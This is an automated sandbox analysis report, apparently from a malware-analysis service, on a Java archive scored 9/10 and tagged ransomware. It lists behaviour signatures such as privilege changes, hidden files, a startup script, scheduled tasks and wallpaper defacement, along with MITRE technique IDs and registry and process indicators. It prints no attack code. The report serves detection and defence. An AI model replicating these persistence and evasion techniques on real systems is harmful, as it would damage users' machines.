2f042b4719f633a0f1523edbd2a16ff39aa89ac972cfac99b0839ddcf4325508

Resubmissions

28/03/2025, 10:25

250328-mf4saswqx8 9

28/03/2025, 07:35

250328-jen4nstset 9

Analysis

max time kernel
174s
max time network
178s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
28/03/2025, 10:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Slut-SNAPSHOT.jar
Size

9.1MB
MD5

455375c10cda4be422ca3a4650a7a46d
SHA1

8f9feef2b406fc1ef670dfdf7f7d1325be0a487b
SHA256

2f042b4719f633a0f1523edbd2a16ff39aa89ac972cfac99b0839ddcf4325508
SHA512

63df3e4c1a095e11386280f8149250045bb3a23c75aa7ac506b2e1c1dc92af6b28ca611bb26376338c8b810339009d36cc91ff23c42c9f4c3d2d20e2eac742bf
SSDEEP

196608:M0eFhl3/t4NXGPruQgWRMMWmtemJbhCgPBZVjokOGmqOiNJ5tyW0RH16RnbpS2M/:+FhMNIrVeVmLb531zBN3YN16Nc2+1

Score

9^/10

defense_evasion discovery execution ransomware

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	5008	powershell.exe
3	5008	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5448	PowerShell.exe
5008	powershell.exe
5868	powershell.exe
5008	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
1428	net1.exe
1916	net.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4172	attrib.exe
3120	attrib.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updateFiles.vbs	java.exe

Loads dropped DLL 1 IoCs

pid	Process
2476	java.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1300	icacls.exe
2896	icacls.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "c:/ProgramData/slut/wallpaper.jpg"	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Control Panel\Desktop\Wallpaper = "C:/ProgramData/slut/wallpaper.jpg"	powershell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\test8484507459623159637.dll	java.exe
File created	C:\Program Files\test8484507459623159637.dll	java.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FileCoAuth.exe

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876311560913015"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 57 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1136229799-3442283115-138161576-1000\{83789984-391E-445C-8813-14A8002DC46B}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1136229799-3442283115-138161576-1000\{F9B41610-AFCF-4854-91DF-60F42420C64C}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe

Modifies registry key 1 TTPs 17 IoCs

Modify Registry

T1112

pid	Process
4808	REG.exe
3196	REG.exe
3368	REG.exe
1408	REG.exe
1492	REG.exe
3712	REG.exe
4228	REG.exe
2632	REG.exe
2296	REG.exe
4976	REG.exe
1876	REG.exe
1228	REG.exe
1292	REG.exe
3224	REG.exe
4036	REG.exe
2564	REG.exe
2196	REG.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\images.webp:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\images.jpg:Zone.Identifier	chrome.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3248	schtasks.exe
1288	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
5008	powershell.exe
5008	powershell.exe
5868	powershell.exe
5868	powershell.exe
5868	powershell.exe
5448	PowerShell.exe
5448	PowerShell.exe
5448	PowerShell.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
576	chrome.exe
576	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
5960	msedge.exe
5960	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	5868	powershell.exe
Token: SeDebugPrivilege	5448	PowerShell.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: 33	5464	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5464	AUDIODG.EXE
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	5840	chrome.exe
Token: SeCreatePagefilePrivilege	5840	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe
Token: SeCreatePagefilePrivilege	576	chrome.exe
Token: SeShutdownPrivilege	576	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1444	msedge.exe
1444	msedge.exe
1444	msedge.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
5840	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe
576	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2476	java.exe
5236	chrome.exe
4384	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 1300	2476	java.exe	82
PID 2476 wrote to memory of 1300	2476	java.exe	82
PID 2476 wrote to memory of 2896	2476	java.exe	83
PID 2476 wrote to memory of 2896	2476	java.exe	83
PID 2476 wrote to memory of 4172	2476	java.exe	84
PID 2476 wrote to memory of 4172	2476	java.exe	84
PID 2476 wrote to memory of 3120	2476	java.exe	87
PID 2476 wrote to memory of 3120	2476	java.exe	87
PID 2476 wrote to memory of 2244	2476	java.exe	89
PID 2476 wrote to memory of 2244	2476	java.exe	89
PID 2476 wrote to memory of 3248	2476	java.exe	91
PID 2476 wrote to memory of 3248	2476	java.exe	91
PID 2476 wrote to memory of 4808	2476	java.exe	95
PID 2476 wrote to memory of 4808	2476	java.exe	95
PID 2476 wrote to memory of 3224	2476	java.exe	96
PID 2476 wrote to memory of 3224	2476	java.exe	96
PID 2476 wrote to memory of 1532	2476	java.exe	99
PID 2476 wrote to memory of 1532	2476	java.exe	99
PID 2476 wrote to memory of 3732	2476	java.exe	101
PID 2476 wrote to memory of 3732	2476	java.exe	101
PID 2476 wrote to memory of 3196	2476	java.exe	102
PID 2476 wrote to memory of 3196	2476	java.exe	102
PID 2476 wrote to memory of 1376	2476	java.exe	104
PID 2476 wrote to memory of 1376	2476	java.exe	104
PID 1376 wrote to memory of 5008	1376	cmd.exe	107
PID 1376 wrote to memory of 5008	1376	cmd.exe	107
PID 2476 wrote to memory of 1492	2476	java.exe	108
PID 2476 wrote to memory of 1492	2476	java.exe	108
PID 2476 wrote to memory of 3712	2476	java.exe	110
PID 2476 wrote to memory of 3712	2476	java.exe	110
PID 2476 wrote to memory of 1876	2476	java.exe	111
PID 2476 wrote to memory of 1876	2476	java.exe	111
PID 2476 wrote to memory of 4228	2476	java.exe	113
PID 2476 wrote to memory of 4228	2476	java.exe	113
PID 2476 wrote to memory of 3368	2476	java.exe	116
PID 2476 wrote to memory of 3368	2476	java.exe	116
PID 2476 wrote to memory of 2632	2476	java.exe	118
PID 2476 wrote to memory of 2632	2476	java.exe	118
PID 2476 wrote to memory of 1228	2476	java.exe	119
PID 2476 wrote to memory of 1228	2476	java.exe	119
PID 2476 wrote to memory of 1408	2476	java.exe	120
PID 2476 wrote to memory of 1408	2476	java.exe	120
PID 2476 wrote to memory of 2296	2476	java.exe	121
PID 2476 wrote to memory of 2296	2476	java.exe	121
PID 2476 wrote to memory of 2196	2476	java.exe	122
PID 2476 wrote to memory of 2196	2476	java.exe	122
PID 2476 wrote to memory of 1292	2476	java.exe	123
PID 2476 wrote to memory of 1292	2476	java.exe	123
PID 2476 wrote to memory of 2564	2476	java.exe	125
PID 2476 wrote to memory of 2564	2476	java.exe	125
PID 2476 wrote to memory of 4036	2476	java.exe	127
PID 2476 wrote to memory of 4036	2476	java.exe	127
PID 2476 wrote to memory of 1916	2476	java.exe	129
PID 2476 wrote to memory of 1916	2476	java.exe	129
PID 1916 wrote to memory of 1428	1916	net.exe	136
PID 1916 wrote to memory of 1428	1916	net.exe	136
